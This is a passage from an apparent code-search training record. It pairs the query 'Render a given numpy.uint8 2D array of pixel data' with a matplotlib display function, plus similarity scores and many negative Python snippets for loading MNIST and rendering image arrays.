open('train_image.pkl', 'rb') as f:\n\t\ttrain_data = pickle.load(f)\n\n\tprint(np.unique(np.asarray(train_label)))\n\n\treturn (train_label, np.asarray(train_data))", "def load_mnist_data(amount : int = None, mnist_location : str = \"C:\\\\Users\\\\Vova\\\\PycharmProjects\\\\Neural_Network_test\\\\mnist-csv\",\n to_shuffle = True, output_process_info = True, debug=False) -> Tuple[np.array, np.array]:\n if debug:\n output_process_info = True\n buff_all_file_names = recursive_relative_lsdir(mnist_location)\n if output_process_info:\n print(\"Got mnist file names!\")\n\n if to_shuffle:\n random.shuffle(buff_all_file_names)\n if output_process_info:\n print(\"Shuffled mnist images!\")\n\n if amount is not None:\n all_file_names = buff_all_file_names[:amount]\n else:\n all_file_names = buff_all_file_names\n\n labels = np.array([int(split_path(p)[-2]) for p in all_file_names])\n if output_process_info:\n print(f\"Labeled mnist file names ({len(labels)} pcs)!\")\n\n if debug:\n s = 0\n for i in range(10):\n print(f\"Pictures for number {i}: {list(labels).count(i)}\")\n s += list(labels).count(i)\n print(\"Total:\", s)\n\n # Loading images:\n images = np.zeros((len(labels), 28, 28), dtype=np.float64)\n for i in range(len(all_file_names)):\n images[i] = convert_csv_to_array(all_file_names[i])\n percent = 100 * i / len(all_file_names)\n if random.random() < 0.001:\n print(f\"Loading is {round(percent, 3)} % ready... \", end=\"\\n\\r\")\n\n print(\"Your mnist dataset is ready :) !!!\")\n\n return labels, images", "def load_images(filelist):\n # pixel value range 0-255\n if not isinstance(filelist, list):\n im = Image.open(filelist).convert('L')\n return np.array(im).reshape(1, im.size[1], im.size[0], 1)\n data = []\n for file in filelist:\n im = Image.open(file).convert('L')\n data.append(np.array(im).reshape(1, im.size[1], im.size[0], 1))\n return data", "def load_images(input_dir, batch_shape):\n images = np.zeros(batch_shape)\n filenames = []\n idx = 0\n batch_size = batch_shape[0]\n # all_files = tf.gfile.Glob(os.path.join(input_dir, '*.png'))\n # test_files = [all_files[idx] for x in np.random.choice(len(all_files), 200, replace=False)]\n # for filepath in test_files:\n for filepath in tf.gfile.Glob(os.path.join(input_dir, '*.png')):\n with tf.gfile.Open(filepath) as f:\n image = imread(f, mode='RGB').astype(np.float) / 255.0\n # Images for inception classifier are normalized to be in [-1, 1] interval.\n images[idx, :, :, :] = image * 2.0 - 1.0\n filenames.append(os.path.basename(filepath))\n idx += 1\n if idx == batch_size:\n yield filenames, images\n filenames = []\n images = np.zeros(batch_shape)\n idx = 0\n if idx > 0:\n yield filenames, images", "def load_mnist(dataset_name='mnist', **kwargs):\n dataset_name = dataset_name.strip().lower().replace('minist', 'mnist')\n\n if dataset_name.lower() not in ['mnist', 'fashion-mnist']:\n raise ValueError('Only mnist or fashion-mnist are valid dataset_name.')\n\n base = 'http://yann.lecun.com/exdb/mnist/'\n if dataset_name == 'fashion-mnist':\n base = 'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/'\n\n dirname = os.path.join(_trident_dir, dataset_name)\n make_dir_if_need(dirname)\n\n \"\"\"Load MNIST data from `path`\"\"\"\n trainData = None\n testData = None\n for kind in ['train', 'test']:\n labels_file = '{0}-labels-idx1-ubyte.gz'.format( 't10k' if dataset_name in ('mnist', 'fashion-mnist') and kind == 'test' else kind)\n images_file = '{0}-images-idx3-ubyte.gz'.format( 't10k' if dataset_name in ('mnist', 'fashion-mnist') and kind == 'test' else kind)\n # if dataset_name == 'emnist' :\n # labels_file='emnist-balanced-'+labels_file\n # images_file = 'emnist-balanced-' + images_file\n\n is_data_download = download_file(base + labels_file, dirname, labels_file, dataset_name + '_labels_{0}'.format(kind))\n is_label_download = download_file(base + images_file, dirname, images_file, dataset_name + '_images_{0}'.format(kind))\n if is_data_download and is_label_download:\n labels_path = os.path.join(dirname, labels_file)\n images_path = os.path.join(dirname, images_file)\n labeldata = None\n imagedata = None\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8, offset=8)\n labels = np.squeeze(labels).astype(np.int64)\n labeldata = LabelDataset(labels.tolist(),object_type=ObjectType.classification_label)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8, offset=16)\n images = np.reshape(images, (len(labels), 784)).astype(dtype=_session.floatx)\n images = np.reshape(images, (-1, 28, 28))\n imagedata = ImageDataset(images, object_type=ObjectType.gray)\n if kind == 'train':\n trainData = Iterator(data=imagedata, label=labeldata)\n else:\n testData = Iterator(data=imagedata, label=labeldata)\n\n dataset = DataProvider(dataset_name, traindata=trainData, testdata=testData)\n dataset.binding_class_names(\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] if dataset_name == 'mnist' else ['T-shirt/top', 'Trouser', 'Pullover',\n 'Dress', 'Coat', 'Sandal', 'Shirt',\n 'Sneaker', 'Bag', 'Ankle boot'],\n 'en-US')\n\n return dataset\n return None", "def load_mnist(train_data=True, test_data=False):\n os.chdir(ROOT_DIR)\n RESOURCES = [\n 'train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz'\n ]\n\n if (os.path.isdir('data') == 0):\n os.mkdir('data')\n if (os.path.isdir('data/mnist') == 0):\n os.mkdir('data/mnist')\n for name in RESOURCES:\n if (os.path.isfile('data/mnist/' + name) == 0):\n url = 'https://github.com/HIPS/hypergrad/raw/master/data/mnist/' + name\n r = requests.get(url, allow_redirects=True)\n open('data/mnist/' + name, 'wb').write(r.content)\n\n return get_images(train_data, test_data), get_labels(train_data, test_data)", "def extract_labels(f, one_hot=False, num_classes=10):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2049:\n\t\t\traise ValueError('Invalid magic number %d in MNIST label file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_items = _read32(bytestream)\n\t\tbuf = bytestream.read(num_items)\n\t\tlabels = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tif one_hot:\n\t\t\treturn dense_to_one_hot(labels, num_classes)\n\t\treturn labels" ]
[ "0.7315804", "0.7006713", "0.6858111", "0.679963", "0.67536896", "0.66597587", "0.6541016", "0.6534925", "0.64882743", "0.6464874", "0.64425945", "0.6425871", "0.6410244", "0.63993555", "0.63947785", "0.63876855", "0.6385198", "0.638357", "0.63787776", "0.6377489", "0.63731724", "0.63731724", "0.636989", "0.6352457", "0.6351951", "0.63468134", "0.63455844", "0.6341949", "0.63357073", "0.63017946", "0.62983096", "0.6290907", "0.6288806", "0.6279747", "0.6268433", "0.6264253", "0.62552315", "0.6246953", "0.62435514", "0.6239381", "0.62325287", "0.6230796", "0.62203676", "0.62146246", "0.6197815", "0.6194898", "0.6192909", "0.61761963", "0.617527", "0.61490923", "0.61211663", "0.61178625", "0.60970306", "0.6079482", "0.6076527", "0.6074948", "0.60709023", "0.6068326", "0.6060465", "0.60592127", "0.60551095", "0.6052272", "0.6050346", "0.6047254", "0.6041249", "0.6037301", "0.6030159", "0.6013727", "0.6004389", "0.60037863", "0.59822595", "0.59467757", "0.5941879", "0.59400856", "0.59394807", "0.5915455", "0.5901478", "0.5890986", "0.58899117", "0.5886207", "0.58832437", "0.58788145", "0.5868975", "0.58663815", "0.5864649", "0.58584285", "0.58573127", "0.5853375", "0.5829219", "0.58248055", "0.5805781", "0.5803976", "0.57990056", "0.57985324", "0.5796923", "0.57842517", "0.5783535", "0.57807887", "0.57802343", "0.5777534" ]
0.6018545
67
Render a given numpy.uint8 2D array of pixel data.
def show(image): from matplotlib import pyplot import matplotlib as mpl fig = pyplot.figure() ax = fig.add_subplot(1,1,1) imgplot = ax.imshow(image, cmap=mpl.cm.Greys) imgplot.set_interpolation('nearest') ax.xaxis.set_ticks_position('top') ax.yaxis.set_ticks_position('left') pyplot.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_pixel_array(arr, figsize=(10, 10)):\n arr = arr.squeeze()\n plt.figure(figsize=figsize)\n plt.imshow(arr, cmap=plt.cm.bone)\n plt.show()", "def render(self):\n np_img = np.array(self.prev_img, dtype=np.uint8)\n np_img = np.swapaxes(np_img, 0, 2)\n return np_img", "def data(self, arr):\n self.bitmap(arr, 1)", "def fig2data(figure):\n # draw the renderer\n figure.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = figure.canvas.get_width_height()\n buf = np.fromstring(figure.canvas.tostring_argb(), dtype=np.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = figure.roll(buf, 3, axis=2)\n return buf", "def display(array):\n plt.figure()\n plt.imshow(array)\n plt.show()", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = np.fromstring(fig.canvas.tostring_argb(), dtype=np.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis=2)\n return buf", "def render(self):\n\n pixels = [\n [Color() for _ in range(self.width)] for _ in range(self.height)]\n\n for y in range(self.height):\n for x in range(self.width):\n ray_direction = Point(x, y) - self.camera\n ray = Ray(self.camera, ray_direction)\n pixels[y][x] = self._trace_ray(ray)\n\n return pixels", "def generate_colour_data(width, height, imagiry_data, pixel2coord):\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = np.fromstring(fig.canvas.tostring_argb(), dtype=numpy.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis=2)\n return buf", "def draw_pixel_to_display(self):\n register = self.return_middle_registers(self.opcode)\n x = self.registers[register[0]]\n y = self.registers[register[1]]\n height = self.opcode & 0xF\n\n self.registers[0xF] = 0\n\n x = bit_utils.wrap_around(x, self.display.width)\n y = bit_utils.wrap_around(y, self.display.height)\n\n for yline in range(0, height):\n pixels = self.memory[self.I + yline]\n y1 = bit_utils.wrap_around(y + yline, self.display.height)\n for xline in range(0, 8):\n x1 = bit_utils.wrap_around(x + xline, self.display.width)\n if pixels & (0x80 >> xline) != 0:\n if self.display.set_pixel(x1, y1):\n self.registers[0xF] = 1\n\n self.display.draw_flag = True\n logger.info(\"Drawing sprite from {} to {} at {}, {}\".format(\n hex(self.I),\n hex(self.I + height),\n x, y))", "def disImg(data=None,colorbar=False):\n size = np.sqrt(len(data[4:]))\n xmm = data[0]\n ymm = data[1]\n pl.matshow(data[4:].reshape(size,size),fignum=False)\n if colorbar == True:\n pl.colorbar()\n pl.xlim(0,size-1)\n pl.ylim(0,size-1)\n pl.xlabel('Pixels')\n pl.ylabel('Pixels')\n pl.grid(color='yellow')", "def render_frame_color(self, sim: Simulator) -> np.array:\n (w, h) = sim.get_frame_size()\n rgba = 4\n size = h * w * rgba\n frame = bytearray(size)\n self.get_state().render_into_buffer(frame, True)\n return np.asarray(frame, dtype=np.uint8).reshape(h, w, rgba)", "def imshow(image):\n iio.imshow(dtype.im2uint(image))", "def display(self, colorArray):\n pass", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = numpy.fromstring(fig.canvas.tostring_argb(), dtype=numpy.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode.\n # Roll the ALPHA channel to have it in RGBA mode\n buf = numpy.roll(buf, 3, axis=2)\n return buf", "def get_rendered_image(self) -> np.ndarray:\n return np.transpose(self.state['observation'], [1, 2, 0])", "def fig2buf(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w,h = fig.canvas.get_width_height()\n buf = np.fromstring ( fig.canvas.tostring_argb(), dtype=np.uint8 )\n buf.shape = (h, w, 4)\n \n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis = 2 )\n buf = buf[0::1,0::1] #slice to make image 4x smaller and use only the R channel of RGBA\n buf = buf[0::1,0::1, 0:3] #slice to make image 4x smaller and use only the R channel of RGBA\n return buf", "def _tile_image(self, data):\n image = Image.open(BytesIO(data))\n return image.convert('RGBA')", "def show_digit( Pixels ):\n from matplotlib import pyplot as plt\n print(Pixels.shape)\n Patch = Pixels.reshape((8,8))\n plt.figure(1, figsize=(4,4))\n plt.imshow(Patch, cmap=plt.cm.gray_r, interpolation='nearest') # plt.cm.gray_r # plt.cm.hot\n plt.show()", "def show_digit( Pixels ):\r\n print(Pixels.shape)\r\n Patch = Pixels.reshape((8,8))\r\n plt.figure(1, figsize=(4,4))\r\n plt.imshow(Patch, cmap=plt.cm.gray_r, interpolation='nearest') # cm.gray_r # cm.hot\r\n plt.show()", "def render_frame_grayscale(self, sim: Simulator) -> np.array:\n (w, h) = sim.get_frame_size()\n depth = 1\n size = h * w * depth\n frame = bytearray(size)\n self.get_state().render_into_buffer(frame, False)\n return np.asarray(frame, dtype=np.uint8).reshape(h, w, depth)", "def render_array(self, resolution=300, channel=\"GRAYSCALE\"):\n # Method below returns a cairocffi.ImageSurface object\n # https://cairocffi.readthedocs.io/en/latest/api.html#cairocffi.ImageSurface\n surface, width, height = self._document.write_image_surface(\n resolution=resolution\n )\n img_format = surface.get_format()\n\n # This is BGRA channel in little endian (reverse)\n if img_format != FORMAT_ARGB32:\n raise RuntimeError(\n f\"Expect surface format to be 'cairocffi.FORMAT_ARGB32', but got {img_format}.\" +\n \"Please check the underlining implementation of 'weasyprint.document.Document.write_image_surface()'\"\n )\n\n img_buffer = surface.get_data()\n # Returns image array in \"BGRA\" channel\n img_array = np.ndarray(\n shape=(height, width, 4), dtype=np.uint8, buffer=img_buffer\n )\n if channel == \"GRAYSCALE\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2GRAY)\n elif channel == \"RGBA\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2RGBA)\n elif channel == \"RGB\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2RGB)\n elif channel == \"BGRA\":\n return np.copy(img_array)\n elif channel == \"BGR\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2BGR)\n else:\n valid_channels = [\"GRAYSCALE\", \"RGB\", \"RGBA\", \"BGR\", \"BGRA\"]\n raise ValueError(\n f\"Invalid channel code {channel}. Valid values are: {valid_channels}.\"\n )", "def map_screen(self, data_array):\n\n if len(data_array) == 0:\n return []\n elif len(data_array) == 1:\n xtmp, ytmp = transpose(data_array)\n x_ary = xtmp\n y_ary = ytmp\n else:\n x_ary, y_ary = transpose(data_array)\n\n sx = self.index_mapper.map_screen(x_ary)\n sy = self.value_mapper.map_screen(y_ary)\n\n if self.orientation == 'h':\n return transpose(array((sx, sy)))\n else:\n return transpose(array((sy, sx)))", "def render(filename,i):\n print('running render')\n A = np.genfromtxt(filename,skip_header=1,dtype=float,delimiter=',')\n img = np.array(A[i,:],copy=True)\n print(img.shape)\n img = img.reshape(28,28)\n img = 255 - img\n print(img.shape)\n plt.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\n plt.savefig(\"img\" + str(i)+\"render\"+ \".png\")", "def fig2array(fig):\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n buf = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n buf.shape = (w, h, 3)\n return buf", "async def handle(cls, payload:bytearray):\n logger.debug('Rendering graphics')\n try:\n arr = struct.unpack(f'<{len(payload)}B', payload)[6:66]\n # generates 1 pixel heigth image\n img = Image.frombytes(data=bytes(arr), size=(len(arr)*8,1), mode='1')\n # pixel data is repeated several times\n repeats = struct.unpack('<2B', payload[4:6])[0]\n # prepare new image\n bc = Image.new(mode='1', size=(len(arr)*8, repeats))\n # append 1 px data several times (repeats)\n for i in range(0,repeats):\n bc.paste(img, (0,i))\n # invert colors black/white\n bc_inverted = ImageOps.invert(bc.convert('L'))\n except Exception as e:\n logger.exception(e)\n else:\n Printer().buffer.image(bc_inverted, impl=cls.impl, center=cls.center)\n logger.debug('Buffering barcode image')", "def pngxy(data):\n ihdr = data.index(b'IHDR')\n # next 8 bytes are width/height\n w4h4 = data[ihdr+4:ihdr+12]\n return struct.unpack('>ii', w4h4)", "def visualize_channels(channels_uint8, nb_vertically, path):\n if channels_uint8.dtype != numpy.uint8:\n raise TypeError('`channels_uint8.dtype` is not equal to `numpy.uint8`.')\n \n # If `channels_uint8.ndim` is not equal to 4, the unpacking\n # below raises a `ValueError` exception.\n # If `channels_uint8.shape[3]` is not equal to 1, `numpy.squeeze`\n # raises a `ValueError` exception.\n (nb_images, height_channel, width_channel, _) = channels_uint8.shape\n \n # If the check below did not exist, the channel of some\n # images may be missing in `image_uint8`.\n if nb_images % nb_vertically != 0:\n raise ValueError('`channels_uint8.shape[0]` is not divisible by `nb_vertically`.')\n \n # `nb_horizontally` has to be an integer.\n nb_horizontally = nb_images//nb_vertically\n image_uint8 = 255*numpy.ones((nb_vertically*(height_channel + 1) + 1, nb_horizontally*(width_channel + 1) + 1), dtype=numpy.uint8)\n for i in range(nb_vertically):\n for j in range(nb_horizontally):\n image_uint8[i*(height_channel + 1) + 1:(i + 1)*(height_channel + 1), j*(width_channel + 1) + 1:(j + 1)*(width_channel + 1)] = \\\n numpy.squeeze(channels_uint8[i*nb_horizontally + j, :, :, :],\n axis=2)\n save_image(path,\n image_uint8)", "def modifyPixel(pix, data):\n datalist = convertData(data)\n lendata = len(datalist)\n imdata = iter(pix)\n\n for i in range(lendata):\n pix = [value for value in imdata.__next__()[:3] +\n imdata.__next__()[:3] +\n imdata.__next__()[:3]]\n\n for j in range(0, 8):\n if (datalist[i][j] == '0' and pix[j] % 2 != 0):\n pix[j] -= 1\n\n elif (datalist[i][j] == '1' and pix[j] % 2 == 0):\n if (pix[j] != 0):\n pix[j] -= 1\n else:\n pix[j] += 1\n\n if (i == lendata - 1):\n if (pix[-1] % 2 == 0):\n if (pix[-1] != 0):\n pix[-1] -= 1\n else:\n pix[-1] += 1\n\n else:\n if (pix[-1] % 2 != 0):\n pix[-1] -= 1\n\n pix = tuple(pix)\n yield pix[0:3]\n yield pix[3:6]\n yield pix[6:9]", "def render_image(grid,window):\r\n X = len(grid[0])\r\n Y = len(grid)\r\n#top row:\r\n for j in range(Y):\r\n for sub_j in range(3): #3 rows \r\n ROW = []\r\n for i in range(X):\r\n ROW += grid[j][i].arr[sub_j]\r\n \r\n for k in range(len(ROW)):\r\n COLOR = (ROW[k],ROW[k],ROW[k])\r\n Y_pos = (3*j + sub_j)*pixel_size*scale\r\n X_pos = k*(pixel_size)*scale\r\n width = height = pixel_size*scale\r\n pygame.draw.rect(window,COLOR,(X_pos,Y_pos,width,height))\r\n \r\n# print(ROW)\r\n return", "def _repr_html_(self):\n\n import numpy as np\n import matplotlib.pyplot as plt\n from .._tier9 import imshow\n\n\n size_in_pixels = np.prod(self.shape)\n size_in_bytes = size_in_pixels * self.dtype.itemsize\n\n labels = (self.dtype == np.uint32)\n\n # In case the image is 2D, 3D and larger than 100 pixels, turn on fancy view\n if len(self.shape) in (2, 3) and size_in_pixels >= 100:\n import matplotlib.pyplot as plt\n imshow(self,\n labels=labels,\n continue_drawing=True,\n colorbar=not labels)\n image = self._png_to_html(self._plt_to_png())\n else:\n return \"<pre>cle.array(\" + str(np.asarray(self)) + \", dtype=\" + str(self.dtype) + \")</pre>\"\n\n\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n size = \"{:.1f}\".format(size_in_bytes) + \" GB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" MB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" kB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" B\"\n\n histogram = \"\"\n\n if size_in_bytes < 100 * 1024 * 1024:\n if not labels:\n\n import numpy as np\n from .._tier2 import minimum_of_all_pixels, maximum_of_all_pixels\n from .._tier3 import histogram\n\n num_bins = 32\n\n h = np.asarray(histogram(self, num_bins=num_bins))\n\n plt.figure(figsize=(1.8, 1.2))\n plt.bar(range(0, len(h)), h)\n\n # hide axis text\n # https://stackoverflow.com/questions/2176424/hiding-axis-text-in-matplotlib-plots\n # https://pythonguides.com/matplotlib-remove-tick-labels\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([])\n frame1.axes.yaxis.set_ticklabels([])\n plt.tick_params(left=False, bottom=False)\n\n histogram = self._png_to_html(self._plt_to_png())\n\n min_max = \"<tr><td>min</td><td>\" + str(self.min()) + \"</td></tr>\" + \\\n \"<tr><td>max</td><td>\" + str(self.max()) + \"</td></tr>\"\n\n else:\n\n min_max = \"\"\n\n all = [\n \"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style=\\\"text-align: center; vertical-align: top;\\\">\",\n \"<b><a href=\\\"https://github.com/clEsperanto/pyclesperanto_prototype\\\" target=\\\"_blank\\\">cle._</a> image</b><br/>\",\n \"<table>\",\n \"<tr><td>shape</td><td>\" + str(self.shape).replace(\" \", \"&nbsp;\") + \"</td></tr>\",\n \"<tr><td>dtype</td><td>\" + str(self.dtype) + \"</td></tr>\",\n \"<tr><td>size</td><td>\" + size + \"</td></tr>\",\n min_max,\n \"</table>\",\n histogram,\n \"</td>\",\n \"</tr>\",\n \"</table>\",\n ]\n\n return \"\\n\".join(all)", "def render_image(self, arr, order, win_coord):\n self.logger.debug(\"redraw surface\")\n if self.surface is None:\n return\n\n dst_x, dst_y = win_coord[:2]\n\n daht, dawd, depth = arr.shape\n self.logger.debug(\"arr shape is %dx%dx%d\" % (dawd, daht, depth))\n\n cr = cairo.Context(self.surface)\n # TODO: is it really necessary to hang on to this context?\n self.cr = cr\n\n # fill surface with background color\n imgwin_wd, imgwin_ht = self.viewer.get_window_size()\n cr.rectangle(0, 0, imgwin_wd, imgwin_ht)\n r, g, b = self.viewer.get_bg()\n cr.set_source_rgba(r, g, b)\n cr.fill()\n\n stride = cairo.ImageSurface.format_stride_for_width(cairo.FORMAT_ARGB32,\n dawd)\n img_surface = cairo.ImageSurface.create_for_data(arr,\n cairo.FORMAT_ARGB32,\n dawd, daht, stride)\n\n cr.set_source_surface(img_surface, dst_x, dst_y)\n cr.set_operator(cairo.OPERATOR_SOURCE)\n\n cr.mask_surface(img_surface, dst_x, dst_y)\n cr.fill()", "def make8UC(mat):\n mat_256 = mat[:,:]# *255\n mat_256.round()\n mat_8UC = np.uint8(mat_256)\n \n return mat_8UC", "def bitmap(arr, dc):\n wiringPy.digital_write(pin_DC, dc)\n wiringPy.digital_write_serial_array(0, struct.pack('B'*len(arr), *arr))", "def _arr_to_img(arr, verbose=False):\n return Image.fromarray(arr)", "def fig2data ( fig ):\n # draw the renderer\n fig.canvas.draw ( )\n buf = np.array(fig.canvas.renderer._renderer)\n return buf", "def save_image(path, array_uint8, coefficient_enlargement=None):\n if array_uint8.dtype != numpy.uint8:\n raise TypeError('`array_uint8.dtype` is not equal to `numpy.uint8`.')\n if coefficient_enlargement is None:\n enlarged_array_uint8 = array_uint8\n else:\n enlarged_array_uint8 = numpy.repeat(numpy.repeat(array_uint8, coefficient_enlargement, axis=0),\n coefficient_enlargement,\n axis=1)\n image = PIL.Image.fromarray(enlarged_array_uint8)\n image.save(path)", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def fill_row(self, y, buffer):\n for x in range(0, self._width):\n _rgb_565 = self._colorconverter.convert(self._buffer.getpixel((x, y)))\n buffer[x * 2] = (_rgb_565 >> 8) & 0xFF\n buffer[x * 2 + 1] = _rgb_565 & 0xFF\n return buffer", "def GetRGBArray(self, p_int):\n ...", "def __call__(self, uint8_image, n_upscales=0):\n rects = self._dlib_model(uint8_image, n_upscales)\n return [rect_to_pointgraph(r) for r in rects]", "def muestraPokemon(bytes):\n image = Image.open(io.BytesIO(bytes))\n data = np.array(image)\n plt.imshow(data)\n plt.axis('off')\n plt.show()", "def _tile_image(self, data):\n image = Image.open(StringIO(data))\n return image.convert('RGBA')", "def ret(x):\n color = true_color if x else false_color\n return np.tile(color, (SIZE, SIZE, 1)).astype(np.uint8)", "def numpy_to_qimage(np_array: np.ndarray, show_age: bool):\n\n # Only support 2D array of bytes\n assert len(np_array.shape) == 2 and np_array.dtype == np.uint8\n\n width = np_array.shape[1]\n height = np_array.shape[0]\n bytes_per_line = width\n image = QImage(np_array, width, height, bytes_per_line, QImage.Format_Indexed8)\n\n # Maps array values to color\n if show_age:\n image.setColorTable(colors.AGE_COLOR_TABLE)\n else:\n image.setColorTable(colors.BINARY_COLOR_TABLE)\n\n return image", "def convert_image_np(inp):\n inp = inp.numpy().transpose((1, 2, 0))\n inp = (inp*255).astype(np.uint8)\n return inp", "def pixel(self, x: int, y: int, colour: int, /) -> None:", "def render(\n dot_arr: np.ndarray,\n color_arr: Optional[np.ndarray] = None,\n rstrip: bool = True,\n tile: np.ndarray = BRAILLE_TILE,\n) -> str:\n _validate_render_arguments(dot_arr, color_arr)\n\n # Allow conversion for arrays smaller than braille tile\n arr_height, arr_width = dot_arr.shape\n if arr_height < 4 or arr_width < 2:\n pad_right = max(2 - arr_width, 0)\n pad_bottom = max(4 - arr_height, 0)\n\n dot_arr = np.pad(dot_arr, ((0, pad_bottom), (0, pad_right)))\n if color_arr is not None:\n color_arr = np.pad(\n color_arr, ((0, 0), (0, pad_bottom), (0, pad_right), (0, 0))\n )\n arr_height, arr_width = dot_arr.shape\n\n tile_height, tile_width = tile.shape\n\n # Braille tiles must fit over the array without leaving a remainder\n dot_arr = dot_arr[arr_height % tile_height :, arr_width % tile_width :]\n if color_arr is not None:\n color_arr = color_arr[arr_height % 4 :, arr_width % 2 :]\n\n # Divide array(s) into a list of tiles\n tiled_array = split_to_tiles(dot_arr, tile_height, tile_width)\n\n # Clip values of tiles to 0/1 and multiply with `tile`\n masked_bits = np.clip(tiled_array, 0, 1, out=tiled_array) * tile\n\n # New array which contains the sums of each tiles values\n tile_sums = masked_bits.sum(axis=(2, 3)).astype(\n np.int64\n ) # Todo: check if astype is needed\n\n # Add to get the right offset for unicode braille code point\n tile_sums += BRAILLE_CODEPOINT_START\n\n # Join characters to rows, and rows with a linebreak\n if color_arr is None:\n rows = (\n row.astype(\"int32\").view(dtype=f\"U{row.size}\").item() for row in tile_sums\n )\n if rstrip:\n rows_formatted = (line.rstrip(chr(BRAILLE_CODEPOINT_START)) for line in rows)\n else:\n rows_formatted = rows\n return \"\\n\".join(rows_formatted)\n else:\n # If colored array is provided, each color channel is split to tiles, similarly to the gray array.\n # For each braille character there are 3 tiles from separate red, green and blue channels.\n # Averages of a tile from each 3 channels gives 3 values, rgb. Those will be used\n # to create and ANSI escape sequence to give a color to the corresponding braille character.\n colored_tile_means = (\n split_to_tiles(color_arr, tile_height, tile_width)\n .mean(axis=(2, 3))\n .astype(int)\n )\n\n # View the tile sum array as unicode. View contains the braille characters\n unicode_buf = tile_sums.view(\"U2\")\n return colorize_view(unicode_buf, colored_tile_means)", "def Array2PIL(a,lut=None,minvalue=None,maxvalue=None,width=None,height=None,\n flip=None):\n import Image # we only need it here ...\n\n if flip==\"ud\": #up-down exchange\n a=a[::-1,:]\n h,w=Numeric.shape(a)\n## a_min=Numeric.minimum.reduce((Numeric.ravel(a)))\n## a_max=Numeric.maximum.reduce((Numeric.ravel(a)))\n a_min=min(Numeric.ravel(a))\n a_max=max(Numeric.ravel(a))\n\n # allow for an user-specified maximal value:\n if maxvalue!=None and maxvalue>a_max:\n a_max=maxvalue\n # allows for an user-specified minimal value:\n if minvalue!=None and minvalue<a_min:\n a_min=minvalue\n\n if lut is not None:\n if len(lut[0]) == 256:\n \n a=(Numeric.ravel(255.0*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt8)\n\n rgb=Numeric.zeros( (len(a),3),typecode=Numeric.UInt8)\n\n\n lut_=Numeric.zeros( (3,len(lut[0])),Numeric.UInt8)\n 